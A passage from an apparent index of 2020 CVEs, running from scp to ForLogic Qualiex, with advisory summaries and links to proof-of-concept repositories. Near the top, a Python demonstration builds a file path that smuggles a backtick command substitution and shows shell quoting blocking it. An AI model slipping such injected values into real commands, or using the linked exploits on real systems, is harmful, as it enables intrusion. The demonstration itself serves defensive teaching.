- [cpandya2909/CVE-2020-15778](https://github.com/cpandya2909/CVE-2020-15778)
- [Neko-chanQwQ/CVE-2020-15778-Exploit](https://github.com/Neko-chanQwQ/CVE-2020-15778-Exploit)
- [Evan-Zhangyf/CVE-2020-15778](https://github.com/Evan-Zhangyf/CVE-2020-15778)
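The mechanism behind this entry is that scp hands the destination path to the remote login shell as part of a command string, so shell syntax in the path is evaluated on the remote host. The following is an added example and a local simulation, not OpenSSH code: where scp would run `ssh host "scp -t <dest>"`, it runs `sh -c "printf '%s\n' <dest>"` locally, so the local `/bin/sh` stands in for the remote shell and the injected command only echoes a marker. It also shows a wrapper that pre-quotes the remote path before calling a real scp, which assumes the remote login shell is POSIX-like; the paths are constructed.

```python
"""How the destination argument reaches the remote shell in scp, and why
quoting it blocks the command injection.

Added example and local simulation, not OpenSSH code: `sh -c` with printf
stands in for `ssh host "scp -t <dest>"`, and the injected command only echoes
a marker. Paths are constructed.
"""
import shlex
import subprocess

# Constructed destination path carrying a command substitution.
HOSTILE_PATH = "backup`echo INJECTED`.tar"


def remote_command_unquoted(dest):
    """The pattern behind the CVE: the path is spliced into the shell command
    string verbatim, so backticks, $(...) and ; are interpreted remotely."""
    return "printf '%s\\n' " + dest


def remote_command_quoted(dest):
    """Same command with the path quoted for a POSIX shell; metacharacters
    arrive as literal filename bytes."""
    return "printf '%s\\n' " + shlex.quote(dest)


def run_in_shell(command):
    """Run the command string the way a remote login shell would, returning
    what the 'scp -t' stand-in saw as its argument."""
    result = subprocess.run(["sh", "-c", command], capture_output=True,
                            text=True, check=False)
    return result.stdout.rstrip("\n")


def safe_scp_argv(local_file, user, host, remote_path):
    """Argument vector for a real scp call that pre-quotes the remote path for
    the remote shell. Assumption: the remote login shell is POSIX-like;
    shlex.quote is not correct for csh-style or Windows shells."""
    return ["scp", local_file, "%s@%s:%s" % (user, host, shlex.quote(remote_path))]


if __name__ == "__main__":
    print("unquoted ->", run_in_shell(remote_command_unquoted(HOSTILE_PATH)))
    print("quoted   ->", run_in_shell(remote_command_quoted(HOSTILE_PATH)))
    print("argv     ->", safe_scp_argv("site.tar", "deploy", "files.example", HOSTILE_PATH))
```

With the unquoted form the shell substitutes the backticks and the receiving side sees `backupINJECTED.tar`; with the quoted form it sees the path exactly as supplied. Since the vendor declined to validate these arguments, the quoting has to happen in whatever builds the scp destination.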

### CVE-2020-15780 (2020-07-15)

An issue was discovered in drivers/acpi/acpi_configfs.c in the Linux kernel before 5.7.7. Injection of malicious ACPI tables via configfs could be used by attackers to bypass lockdown and secure boot restrictions, aka CID-75b0cea7bf30.

- [Annavid/CVE-2020-15780-exploit](https://github.com/Annavid/CVE-2020-15780-exploit)

### CVE-2020-15802 (2020-09-11)

Devices supporting Bluetooth before 5.1 may allow man-in-the-middle attacks, aka BLURtooth. Cross Transport Key Derivation in Bluetooth Core Specification v4.2 and v5.0 may permit an unauthenticated user to establish a bonding with one transport, either LE or BR/EDR, and replace a bonding already established on the opposing transport, BR/EDR or LE, potentially overwriting an authenticated key with an unauthenticated key, or a key with greater entropy with one with less.

- [francozappa/blur](https://github.com/francozappa/blur)

### CVE-2020-15808
- [manucuf/CVE202015808](https://github.com/manucuf/CVE202015808)

### CVE-2020-15848
- [faklad/CVE-2020-15848](https://github.com/faklad/CVE-2020-15848)

### CVE-2020-15873 (2020-07-21)

In LibreNMS before 1.65.1, an authenticated attacker can achieve SQL Injection via the customoid.inc.php device_id POST parameter to ajax_form.php.

- [limerencee/cs4239-cve-2020-15873](https://github.com/limerencee/cs4239-cve-2020-15873)

### CVE-2020-15906 (2020-10-22)

tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.

- [S1lkys/CVE-2020-15906](https://github.com/S1lkys/CVE-2020-15906)

### CVE-2020-15916 (2020-07-23)

goform/AdvSetLanip endpoint on Tenda AC15 AC1900 15.03.05.19 devices allows remote attackers to execute arbitrary system commands via shell metacharacters in the lanIp POST parameter.

- [geniuszlyy/CVE-2020-15916](https://github.com/geniuszlyy/CVE-2020-15916)

### CVE-2020-15931 (2020-10-20)

Netwrix Account Lockout Examiner before 5.1 allows remote attackers to capture the Net-NTLMv1/v2 authentication challenge hash of the Domain Administrator (that is configured within the product in its installation state) by generating a single Kerberos Pre-Authentication Failed (ID 4771) event on a Domain Controller.

- [optiv/CVE-2020-15931](https://github.com/optiv/CVE-2020-15931)

### CVE-2020-15956 (2020-08-04)

ActiveMediaServer.exe in ACTi NVR3 Standard Server 3.0.12.42 allows remote unauthenticated attackers to trigger a buffer overflow and application termination via a malformed payload.

- [megamagnus/cve-2020-15956](https://github.com/megamagnus/cve-2020-15956)

### CVE-2020-15999 (2020-11-03)

Heap buffer overflow in Freetype in Google Chrome prior to 86.0.4240.111 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

- [oxfemale/CVE-2020-15999](https://github.com/oxfemale/CVE-2020-15999)
- [maarlo/CVE-2020-15999](https://github.com/maarlo/CVE-2020-15999)
- [Marmeus/CVE-2020-15999](https://github.com/Marmeus/CVE-2020-15999)

### CVE-2020-16012 (2021-01-08)

Side-channel information leakage in graphics in Google Chrome prior to 87.0.4280.66 allowed a remote attacker to leak cross-origin data via a crafted HTML page.

- [aleksejspopovs/cve-2020-16012](https://github.com/aleksejspopovs/cve-2020-16012)

### CVE-2020-16125 (2020-11-10)

gdm3 versions before 3.36.2 or 3.38.2 would start gnome-initial-setup if gdm3 can't contact the accountservice service via dbus in a timely manner; on Ubuntu (and potentially derivatives) this could be chained with an additional issue that could allow a local user to create a new privileged account.

- [za970120604/CVE-2020-16125-Reproduction](https://github.com/za970120604/CVE-2020-16125-Reproduction)

### CVE-2020-16126 (2020-11-11)

An Ubuntu-specific modification to AccountsService in versions before 0.6.55-0ubuntu13.2, among other earlier versions, improperly dropped the ruid, allowing untrusted users to send signals to AccountService, thus stopping it from handling D-Bus messages in a timely fashion.

- [zev3n/Ubuntu-Gnome-privilege-escalation](https://github.com/zev3n/Ubuntu-Gnome-privilege-escalation)

### CVE-2020-16152 (2021-11-14)

The NetConfig UI administrative interface in Extreme Networks ExtremeWireless Aerohive HiveOS and IQ Engine through 10.0r8a allows attackers to execute PHP code as the root user via remote HTTP requests that insert this code into a log file and then traverse to that file.

- [eriknl/CVE-2020-16152](https://github.com/eriknl/CVE-2020-16152)
- [Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e](https://github.com/Nate0634034090/nate158g-m-w-n-l-p-d-a-o-e)

### CVE-2020-16270 (2020-10-16)

OLIMPOKS under 3.3.39 allows Auth/Admin ErrorMessage XSS. A remote attacker can use the discovered vulnerability to inject a malicious JavaScript payload into victims' browsers in the context of the vulnerable application. The executed code can be used to steal administrators' cookies, influence the HTML content of the targeted application and perform phishing-related attacks. The vulnerable application is used in more than 3000 organizations in different sectors, from retail to industry.

- [Security-AVS/CVE-2020-16270](https://github.com/Security-AVS/CVE-2020-16270)

### CVE-2020-16846 (2020-11-06)

An issue was discovered in SaltStack Salt through 3002. Sending crafted web requests to the Salt API, with the SSH client enabled, can result in shell injection.

- [zomy22/CVE-2020-16846-Saltstack-Salt-API](https://github.com/zomy22/CVE-2020-16846-Saltstack-Salt-API)
- [hamza-boudouche/projet-secu](https://github.com/hamza-boudouche/projet-secu)

### CVE-2020-16898 (2020-10-16)

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.

To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.

The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.

- [advanced-threat-research/CVE-2020-16898](https://github.com/advanced-threat-research/CVE-2020-16898)
- [corelight/CVE-2020-16898](https://github.com/corelight/CVE-2020-16898)
- [Maliek/CVE-2020-16898_Check](https://github.com/Maliek/CVE-2020-16898_Check)
- [ZephrFish/CVE-2020-16898](https://github.com/ZephrFish/CVE-2020-16898)
- [esnet-security/cve-2020-16898](https://github.com/esnet-security/cve-2020-16898)
- [initconf/CVE-2020-16898-Bad-Neighbor](https://github.com/initconf/CVE-2020-16898-Bad-Neighbor)
- [Q1984/CVE-2020-16898](https://github.com/Q1984/CVE-2020-16898)
- [0xeb-bp/cve-2020-16898](https://github.com/0xeb-bp/cve-2020-16898)
- [jiansiting/cve-2020-16898](https://github.com/jiansiting/cve-2020-16898)
- [CPO-EH/CVE-2020-16898_Workaround](https://github.com/CPO-EH/CVE-2020-16898_Workaround)
- [CPO-EH/CVE-2020-16898_Checker](https://github.com/CPO-EH/CVE-2020-16898_Checker)
- [momika233/CVE-2020-16898-exp](https://github.com/momika233/CVE-2020-16898-exp)
- [komomon/CVE-2020-16898-EXP-POC](https://github.com/komomon/CVE-2020-16898-EXP-POC)
- [komomon/CVE-2020-16898--EXP-POC](https://github.com/komomon/CVE-2020-16898--EXP-POC)

### CVE-2020-16899 (2020-10-16)

A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could cause a target system to stop responding.

To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer. The vulnerability would not allow an attacker to execute code or to elevate user rights directly.

The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.

- [advanced-threat-research/CVE-2020-16899](https://github.com/advanced-threat-research/CVE-2020-16899)

### CVE-2020-16938 (2020-10-16)

An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the user’s system.

To exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted application. The vulnerability would not allow an attacker to execute code or to elevate user rights directly, but it could be used to obtain information that could be used to try to further compromise the affected system.

The update addresses the vulnerability by correcting how the Windows kernel handles objects in memory.

- [ioncodes/CVE-2020-16938](https://github.com/ioncodes/CVE-2020-16938)

### CVE-2020-16939 (2020-10-16)

An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context.

To exploit the vulnerability, an attacker would first have to log on to the system, and then run a specially crafted application to take control over the affected system.

The security update addresses the vulnerability by correcting how Group Policy checks access.

- [rogue-kdc/CVE-2020-16939](https://github.com/rogue-kdc/CVE-2020-16939)

### CVE-2020-16947 (2020-10-16)

A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could run arbitrary code in the context of the targeted user. If the targeted user is logged on with administrative user rights, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.

Exploitation of the vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Outlook software. In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted file to the user and convincing the user to open the file. In a web-based attack scenario, an attacker could host a website (or leverage a compromised website that accepts or hosts user-provided content) that contains a specially crafted file designed to exploit the vulnerability. An attacker would have no way to force users to visit the website. Instead, an attacker would have to convince users to click a link, typically by way of an enticement in an email or instant message, and then convince them to open the specially crafted file.

Note that where severity is indicated as Critical in the Affected Products table, the Preview Pane is an attack vector.

The security update addresses the vulnerability by correcting how Outlook handles objects in memory.

- [0neb1n/CVE-2020-16947](https://github.com/0neb1n/CVE-2020-16947)
- [MasterSploit/CVE-2020-16947](https://github.com/MasterSploit/CVE-2020-16947)

### CVE-2020-17008
- [jas502n/CVE-2020-17008](https://github.com/jas502n/CVE-2020-17008)

### CVE-2020-17035 (2020-11-11)

Windows Kernel Elevation of Privilege Vulnerability

- [flamelu/CVE-2020-17035-patch-analysis](https://github.com/flamelu/CVE-2020-17035-patch-analysis)

### CVE-2020-17057 (2020-11-11)

Windows Win32k Elevation of Privilege Vulnerability

- [fengjixuchui/cve-2020-17057](https://github.com/fengjixuchui/cve-2020-17057)
- [lsw29475/CVE-2020-17057](https://github.com/lsw29475/CVE-2020-17057)

### CVE-2020-17086 (2020-11-11)

Raw Image Extension Remote Code Execution Vulnerability

- [T81oub/CVE-2020-17086](https://github.com/T81oub/CVE-2020-17086)

### CVE-2020-17087 (2020-11-11)

Windows Kernel Local Elevation of Privilege Vulnerability

- [revengsh/CVE-2020-17087](https://github.com/revengsh/CVE-2020-17087)
- [ykg88/OHTS_IE6052-CVE-2020-17087](https://github.com/ykg88/OHTS_IE6052-CVE-2020-17087)
- [vp777/Windows-Non-Paged-Pool-Overflow-Exploitation](https://github.com/vp777/Windows-Non-Paged-Pool-Overflow-Exploitation)
- [raiden757/CVE-2020-17087](https://github.com/raiden757/CVE-2020-17087)

### CVE-2020-17136 (2020-12-09)

Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability

- [xyddnljydd/CVE-2020-17136](https://github.com/xyddnljydd/CVE-2020-17136)
- [cssxn/CVE-2020-17136](https://github.com/cssxn/CVE-2020-17136)

### CVE-2020-17144 (2020-12-09)

Microsoft Exchange Remote Code Execution Vulnerability

- [Airboi/CVE-2020-17144-EXP](https://github.com/Airboi/CVE-2020-17144-EXP)
- [zcgonvh/CVE-2020-17144](https://github.com/zcgonvh/CVE-2020-17144)

### CVE-2020-17382 (2020-10-02)

The MSI AmbientLink MsIo64 driver 1.0.0.8 has a Buffer Overflow (0x80102040, 0x80102044, 0x80102050, and 0x80102054).

- [uf0o/CVE-2020-17382](https://github.com/uf0o/CVE-2020-17382)
- [houseofxyz/CVE-2020-17382](https://github.com/houseofxyz/CVE-2020-17382)

### CVE-2020-17453 (2021-04-05)

WSO2 Management Console through 5.10 allows XSS via the carbon/admin/login.jsp msgId parameter.

- [ydycjz6j/CVE-2020-17453-PoC](https://github.com/ydycjz6j/CVE-2020-17453-PoC)
- [karthi-the-hacker/CVE-2020-17453](https://github.com/karthi-the-hacker/CVE-2020-17453)

### CVE-2020-17456 (2020-08-19)

SEOWON INTECH SLC-130 and SLR-120S devices allow Remote Code Execution via the ipAddr parameter to the system_log.cgi page.

- [Al1ex/CVE-2020-17456](https://github.com/Al1ex/CVE-2020-17456)
- [TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated](https://github.com/TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated)

### CVE-2020-17496 (2020-08-12)

vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.

- [ctlyz123/CVE-2020-17496](https://github.com/ctlyz123/CVE-2020-17496)
- [ludy-dev/vBulletin_5.x-tab_panel-RCE](https://github.com/ludy-dev/vBulletin_5.x-tab_panel-RCE)

### CVE-2020-17518 (2021-01-05)

Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, through a maliciously modified HTTP header. The files can be written to any location accessible by Flink 1.5.1. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit a5264a6f41524afe8ceadf1d8ddc8c80f323ebc4 from apache/flink:master.

- [QmF0c3UK/CVE-2020-17518](https://github.com/QmF0c3UK/CVE-2020-17518)
- [murataydemir/CVE-2020-17518](https://github.com/murataydemir/CVE-2020-17518)
- [rakjong/Flink-CVE-2020-17518-getshell](https://github.com/rakjong/Flink-CVE-2020-17518-getshell)

### CVE-2020-17519 (2021-01-05)

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

- [B1anda0/CVE-2020-17519](https://github.com/B1anda0/CVE-2020-17519)
- [QmF0c3UK/CVE-2020-17519](https://github.com/QmF0c3UK/CVE-2020-17519)
- [dolevf/apache-flink-directory-traversal.nse](https://github.com/dolevf/apache-flink-directory-traversal.nse)
- [hoanx4/CVE-2020-17519](https://github.com/hoanx4/CVE-2020-17519)
- [murataydemir/CVE-2020-17519](https://github.com/murataydemir/CVE-2020-17519)
- [radbsie/CVE-2020-17519-Exp](https://github.com/radbsie/CVE-2020-17519-Exp)
- [yaunsky/CVE-2020-17519-Apache-Flink](https://github.com/yaunsky/CVE-2020-17519-Apache-Flink)
- [Osyanina/westone-CVE-2020-17519-scanner](https://github.com/Osyanina/westone-CVE-2020-17519-scanner)
- [givemefivw/CVE-2020-17519](https://github.com/givemefivw/CVE-2020-17519)
- [MrCl0wnLab/SimplesApachePathTraversal](https://github.com/MrCl0wnLab/SimplesApachePathTraversal)
- [zhangweijie11/CVE-2020-17519](https://github.com/zhangweijie11/CVE-2020-17519)

### CVE-2020-17523 (2021-02-03)

In Apache Shiro before 1.7.1, when Apache Shiro is used with Spring, a specially crafted HTTP request may cause an authentication bypass.

- [jweny/shiro-cve-2020-17523](https://github.com/jweny/shiro-cve-2020-17523)

### CVE-2020-17527 (2020-12-03)

While investigating bug 64830 it was discovered that Apache Tomcat 10.0.0-M1 to 10.0.0-M9, 9.0.0-M1 to 9.0.39 and 8.5.0 to 8.5.59 could re-use an HTTP request header value from the previous stream received on an HTTP/2 connection for the request associated with the subsequent stream. While this would most likely lead to an error and the closure of the HTTP/2 connection, it is possible that information could leak between requests.

- [forse01/CVE-2020-17527-Tomcat](https://github.com/forse01/CVE-2020-17527-Tomcat)

### CVE-2020-17530 (2020-12-11)

Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software: Apache Struts 2.0.0 through 2.5.25.

- [secpool2000/CVE-2020-17530](https://github.com/secpool2000/CVE-2020-17530)
- [ka1n4t/CVE-2020-17530](https://github.com/ka1n4t/CVE-2020-17530)
- [wuzuowei/CVE-2020-17530](https://github.com/wuzuowei/CVE-2020-17530)
- [Al1ex/CVE-2020-17530](https://github.com/Al1ex/CVE-2020-17530)
- [fengziHK/CVE-2020-17530-strust2-061](https://github.com/fengziHK/CVE-2020-17530-strust2-061)
- [ludy-dev/freemarker_RCE_struts2_s2-061](https://github.com/ludy-dev/freemarker_RCE_struts2_s2-061)
- [CyborgSecurity/CVE-2020-17530](https://github.com/CyborgSecurity/CVE-2020-17530)
- [uzzzval/CVE-2020-17530](https://github.com/uzzzval/CVE-2020-17530)
- [killmonday/CVE-2020-17530-s2-061](https://github.com/killmonday/CVE-2020-17530-s2-061)
- [keyuan15/CVE-2020-17530](https://github.com/keyuan15/CVE-2020-17530)
- [nth347/CVE-2020-17530](https://github.com/nth347/CVE-2020-17530)

### CVE-2020-17531 (2020-12-08)

A Java Serialization vulnerability was found in Apache Tapestry 4. Apache Tapestry 4 will attempt to deserialize the "sp" parameter even before invoking the page's validate method, leading to deserialization without authentication. Apache Tapestry 4 reached end of life in 2008 and no update to address this issue will be released. Apache Tapestry 5 versions are not vulnerable to this issue. Users of Apache Tapestry 4 should upgrade to the latest Apache Tapestry 5 version.

- [154802388/CVE-2020-17531](https://github.com/154802388/CVE-2020-17531)

### CVE-2020-17533 (2020-12-29)

Apache Accumulo versions 1.5.0 through 1.10.0 and version 2.0.0 do not properly check the return value of some policy enforcement functions before permitting an authenticated user to perform certain administrative operations. Specifically, the return values of the 'canFlush' and 'canPerformSystemActions' security functions are not checked in some instances, therefore allowing an authenticated user with insufficient permissions to perform the following actions: flushing a table, shutting down Accumulo or an individual tablet server, and setting or removing system-wide Accumulo configuration properties.

- [pazeray/CVE-2020-17533](https://github.com/pazeray/CVE-2020-17533)

### CVE-2020-18324 (2022-03-04)

Cross Site Scripting (XSS) vulnerability exists in Subrion CMS 4.2.1 via the q parameter in the Kickstart template.

- [hamm0nz/CVE-2020-18324](https://github.com/hamm0nz/CVE-2020-18324)

### CVE-2020-18325 (2022-03-04)

Multiple Cross Site Scripting (XSS) vulnerabilities exist in Intelliants Subrion CMS v4.2.1 in the Configuration panel.

- [hamm0nz/CVE-2020-18325](https://github.com/hamm0nz/CVE-2020-18325)

### CVE-2020-18326 (2022-03-04)

Cross Site Request Forgery (CSRF) vulnerability exists in Intelliants Subrion CMS v4.2.1 via the Members administrator function, which could let a remote unauthenticated malicious user send an authorised request to a victim and successfully create an arbitrary administrator user.

- [hamm0nz/CVE-2020-18326](https://github.com/hamm0nz/CVE-2020-18326)

### CVE-2020-19360 (2021-01-20)

A local file inclusion vulnerability in FHEM 6.0, via the file parameter of fhem/FileLog_logWrapper, can allow an attacker to include a file, which can lead to sensitive information disclosure.

- [a1665454764/CVE-2020-19360](https://github.com/a1665454764/CVE-2020-19360)
- [zzzz966/CVE-2020-19360](https://github.com/zzzz966/CVE-2020-19360)

### CVE-2020-19586 (2022-09-14)

Incorrect Access Control issue in Yellowfin Business Intelligence 7.3 allows remote attackers to escalate privilege via MIAdminStyles.i4 Admin UI.

- [Deepak983/CVE-2020-19586](https://github.com/Deepak983/CVE-2020-19586)

### CVE-2020-19587 (2022-09-14)

Cross Site Scripting (XSS) vulnerability in configMap parameters in Yellowfin Business Intelligence 7.3 allows remote attackers to run arbitrary code via MIAdminStyles.i4 Admin UI.

- [Deepak983/CVE-2020-19587](https://github.com/Deepak983/CVE-2020-19587)

### CVE-2020-20093 (2022-03-23)

The Facebook Messenger app for iOS 227.0 and prior and Android 228.1.0.10.116 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages.

- [zadewg/RIUS](https://github.com/zadewg/RIUS)

### CVE-2020-21378 (2020-12-21)

SQL injection vulnerability in SeaCMS 10.1 (2020.02.08) via the id parameter in an edit action to admin_members_group.php.

- [sukusec301/SeaCMS-v10.1](https://github.com/sukusec301/SeaCMS-v10.1)

### CVE-2020-23160 (2021-01-22)

Remote code execution in Pyrescom Termod4 time management devices before 10.04k allows authenticated remote attackers to execute arbitrary commands as root on the devices.

- [Outpost24/Pyrescom-Termod-PoC](https://github.com/Outpost24/Pyrescom-Termod-PoC)

### CVE-2020-23342 (2021-01-19)

A CSRF vulnerability exists in anchor/views/users/edit.php in Anchor CMS 0.12.7 that can be used to modify or delete admin users.

- [DXY0411/CVE-2020-23342](https://github.com/DXY0411/CVE-2020-23342)

### CVE-2020-23489 (2020-11-16)

The import.json.php file before 8.9 for Avideo is vulnerable to a File Deletion vulnerability. This allows the deletion of configuration.php, which leads to certain privilege checks not being in place, and therefore a user can escalate privileges to admin.

- [ahussam/AVideo3xploit](https://github.com/ahussam/AVideo3xploit)

### CVE-2020-23582 (2022-11-21)

A vulnerability in the "/admin/wlmultipleap.asp" of optilink OP-XT71000N version: V2.2 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to create Multiple WLAN BSSID.

- [huzaifahussain98/CVE-2020-23582](https://github.com/huzaifahussain98/CVE-2020-23582)

### CVE-2020-23583 (2022-11-23)

OPTILINK OP-XT71000N V2.2 is vulnerable to Remote Code Execution. The issue occurs when an attacker sends arbitrary code through the "PingTest" interface on "/diag_ping_admin.asp", which leads to command execution. An attacker can trigger the command and fully compromise the system.

- [huzaifahussain98/CVE-2020-23583](https://github.com/huzaifahussain98/CVE-2020-23583)

### CVE-2020-23584 (2022-11-23)

Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2, occurs when the attacker passes arbitrary commands along with the IP address, separated by " | ", in the "PingTest" parameter on "/diag_tracert_admin.asp", which leads to command execution.

- [huzaifahussain98/CVE-2020-23584](https://github.com/huzaifahussain98/CVE-2020-23584)

### CVE-2020-23585 (2022-11-23)

A remote attacker can conduct a cross-site request forgery (CSRF) attack on OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028. The vulnerability is due to insufficient CSRF protections for "mgm_config_file.asp", because of which an attacker can create a crafted CSRF form that sends malicious XML data to "/boaform/admin/formMgmConfigUpload". The exploit allows an attacker to gain full privileges and fully compromise the router and network.

- [huzaifahussain98/CVE-2020-23585](https://github.com/huzaifahussain98/CVE-2020-23585)

### CVE-2020-23586 (2022-11-23)

A vulnerability found in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Add Network Traffic Control Type Rule.

- [huzaifahussain98/CVE-2020-23586](https://github.com/huzaifahussain98/CVE-2020-23586)

### CVE-2020-23587 (2022-11-23)

A vulnerability found in the OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack leading to a man-in-the-middle attack by adding new routes in RoutingConfiguration on "/routing.asp".

- [huzaifahussain98/CVE-2020-23587](https://github.com/huzaifahussain98/CVE-2020-23587)

### CVE-2020-23588 (2022-11-23)

A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to "Enable or Disable Ports" and to "Change port number" through "/rmtacc.asp".

- [huzaifahussain98/CVE-2020-23588](https://github.com/huzaifahussain98/CVE-2020-23588)

### CVE-2020-23589 (2022-11-23)

A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to cause a Denial of Service by rebooting the router through "/mgm_dev_reboot.asp".

- [huzaifahussain98/CVE-2020-23589](https://github.com/huzaifahussain98/CVE-2020-23589)

### CVE-2020-23590 (2022-11-23)

A vulnerability in Optilink OP-XT71000N Hardware version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated remote attacker to conduct a cross-site request forgery (CSRF) attack to change the Password for "WLAN SSID" through "wlwpa.asp".

- [huzaifahussain98/CVE-2020-23590](https://github.com/huzaifahussain98/CVE-2020-23590)

### CVE-2020-23591 (2022-11-23)

A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an attacker to upload arbitrary files through "/mgm_dev_upgrade.asp", which can delete every file for Denial of Service (using 'rm -rf *.*' in the code), open a reverse connection (using an '.asp' webshell), or install a backdoor.

- [huzaifahussain98/CVE-2020-23591](https://github.com/huzaifahussain98/CVE-2020-23591)

### CVE-2020-23592 (2022-11-23)

A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Reset ONU to Factory Default through '/mgm_dev_reset.asp'. Resetting to default leads to Escalation of Privileges by logging in with default credentials.

- [huzaifahussain98/CVE-2020-23592](https://github.com/huzaifahussain98/CVE-2020-23592)

### CVE-2020-23593 (2022-11-23)

A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross site request forgery (CSRF) attack to enable syslog mode through '/mgm_log_cfg.asp'. The system then starts to log events; 'Remote' mode or 'Both' mode on the "Syslog -- Configuration" page logs events and sends them to a remote syslog server IP and port.

- [huzaifahussain98/CVE-2020-23593](https://github.com/huzaifahussain98/CVE-2020-23593)

### CVE-2020-23839 (2020-09-01)

A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.

- [boku7/CVE-2020-23839](https://github.com/boku7/CVE-2020-23839)

### CVE-2020-23934 (2020-08-18)

An issue was discovered in RiteCMS 2.2.1. An authenticated user can directly execute system commands by uploading a php web shell in the "Filemanager" section.

- [H0j3n/CVE-2020-23934](https://github.com/H0j3n/CVE-2020-23934)

### CVE-2020-23968 (2020-11-10)

Ilex International Sign&go Workstation Security Suite 7.1 allows elevation of privileges via a symlink attack on ProgramData\Ilex\S&G\Logs\000-sngWSService1.log.

- [ricardojba/CVE-2020-23968-ILEX-SignGo-EoP](https://github.com/ricardojba/CVE-2020-23968-ILEX-SignGo-EoP)

### CVE-2020-24028 (2020-09-02)

ForLogic Qualiex v1 and v3 allows any authenticated customer to achieve privilege escalation via user creations, password changes, or user permission updates.

- [underprotection/CVE-2020-24028](https://github.com/underprotection/CVE-2020-24028)
- [redteambrasil/CVE-2020-24028](https://github.com/redteambrasil/CVE-2020-24028)

### CVE-2020-24029 (2020-09-02)

Because of unauthenticated password changes in ForLogic Qualiex v1 and v3, customer and admin permissions and data can be accessed via a simple request.

- [underprotection/CVE-2020-24029](https://github.com/underprotection/CVE-2020-24029)
- [redteambrasil/CVE-2020-24029](https://github.com/redteambrasil/CVE-2020-24029)

### CVE-2020-24030 (2020-09-02)

ForLogic Qualiex v1 and v3 has weak token expiration. This allows remote unauthenticated privilege escalation and access to sensitive data via token reuse.

- [underprotection/CVE-2020-24030](https://github.com/underprotection/CVE-2020-24030)
- [redteambrasil/CVE-2020-24030](https://github.com/redteambrasil/CVE-2020-24030)

### CVE-2020-24032 (2020-08-18)

tz.pl on XoruX LPAR2RRD and STOR2RRD 2.70 virtual appliances allows cmd=set&tz=OS command injection via shell metacharacters in a timezone.

- [jet-pentest/CVE-2020-24032](https://github.com/jet-pentest/CVE-2020-24032)

### CVE-2020-24033 (2020-10-22)

An issue was discovered in fs.com S3900 24T4S 1.7.0 and earlier. The form has no authentication or token mechanism, which allows remote attackers to forge requests on behalf of a site administrator to change all settings, including deleting users and creating new users with escalated privileges.

- [M0NsTeRRR/CVE-2020-24033](https://github.com/M0NsTeRRR/CVE-2020-24033)

### CVE-2020-24088 (2023-09-11)

